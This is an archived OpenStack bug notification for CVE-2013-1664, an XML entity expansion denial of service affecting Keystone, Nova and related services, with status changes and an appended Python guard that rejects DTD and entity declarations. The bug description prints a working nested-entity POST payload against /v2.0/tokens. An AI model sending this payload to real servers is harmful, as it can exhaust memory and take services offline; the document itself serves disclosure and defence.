yahoo-eng-team team mailing list archive

[Bug 1100282] Re: DoS through XML entity expansion (CVE-2013-1664)

 

** Also affects: ossa
   Importance: Undecided
       Status: New

** Summary changed:

- DoS through XML entity expansion (CVE-2013-1664)
+ [OSSA 2013-004] DoS through XML entity expansion (CVE-2013-1664)

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to quantum.
https://bugs.launchpad.net/bugs/1100282

Title:
  [OSSA 2013-004] DoS through XML entity expansion (CVE-2013-1664)

Status in Cinder:
  Fix Released
Status in Cinder folsom series:
  Fix Released
Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) essex series:
  Fix Committed
Status in OpenStack Compute (nova) folsom series:
  Fix Released
Status in Oslo - a Library of Common OpenStack Code:
  Fix Released
Status in oslo grizzly series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released
Status in OpenStack Quantum (virtual network service):
  Fix Released

Bug description:
  Jonathan Murray from NCC Group reported that you can DoS keystone
  servers using XML entities in Keystone requests.

  [ Joshua Harlow from Yahoo! independently reported the same issue
  plaguing Nova (using minidom). ]

  POST /v2.0/tokens HTTP/1.1
  content-type: application/xml

  <!DOCTYPE foo [
  <!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
  ]>
  <auth>
  <tenantName>&c;</tenantName>
  <passwordCredentials>
  <username>&c;</username>
  <username>&c;</username>
  <username>&c;</username>
  <username>&c;</username>
  <password>&c;</password>
  <somethingElse>&c;</somethingElse>
  <somethingElse1>&c;</somethingElse1>
  <somethingElse2>&c;</somethingElse2>
  </passwordCredentials>
  </auth>

  In that precise case it might be an issue with the XML library we use,
  although it sounds generally safer to disable parsing ENTITY blocks
  entirely if we can.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1100282/+subscriptions
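
The bug description suggests disabling ENTITY parsing entirely. The following is an added example, not code from the bug report or from any OpenStack patch, showing one way to do that for minidom with the Python standard library only. The names NoEntityExpatParser, EntityForbidden, safe_parse_string and accepts are hypothetical, and the sample documents are constructed.

```python
from xml.dom import minidom
from xml.sax import expatreader


class EntityForbidden(ValueError):
    """Raised when a document carries a DTD or an entity declaration."""


class NoEntityExpatParser(expatreader.ExpatParser):
    """Expat SAX reader that aborts before any entity can be expanded."""

    def _forbid(self, *args):
        raise EntityForbidden("DTD / ENTITY declarations are not accepted")

    def reset(self):
        # reset() builds a fresh pyexpat parser; install the guards on it.
        super().reset()
        self._parser.StartDoctypeDeclHandler = self._forbid    # <!DOCTYPE ...>
        self._parser.EntityDeclHandler = self._forbid          # <!ENTITY ...>
        self._parser.UnparsedEntityDeclHandler = self._forbid  # NDATA entities
        self._parser.ExternalEntityRefHandler = self._forbid   # SYSTEM/PUBLIC refs


def safe_parse_string(xml_text):
    """Parse request XML (a str) into a minidom Document, rejecting entities."""
    return minidom.parseString(xml_text, parser=NoEntityExpatParser())


def accepts(xml_text):
    """True if the document parses, False if it was rejected for entities."""
    try:
        safe_parse_string(xml_text)
        return True
    except EntityForbidden:
        return False


# Constructed sample inputs (not captured traffic).
PLAIN = "<auth><tenantName>demo</tenantName></auth>"
WITH_ENTITY = ('<!DOCTYPE foo [<!ENTITY a "AAAA">]>'
               "<auth><tenantName>&a;</tenantName></auth>")

if __name__ == "__main__":
    print("plain request accepted:", accepts(PLAIN))
    print("entity request accepted:", accepts(WITH_ENTITY))
```

The guard fires on the DOCTYPE declaration itself, so the request is rejected before the parser allocates anything for the nested entities.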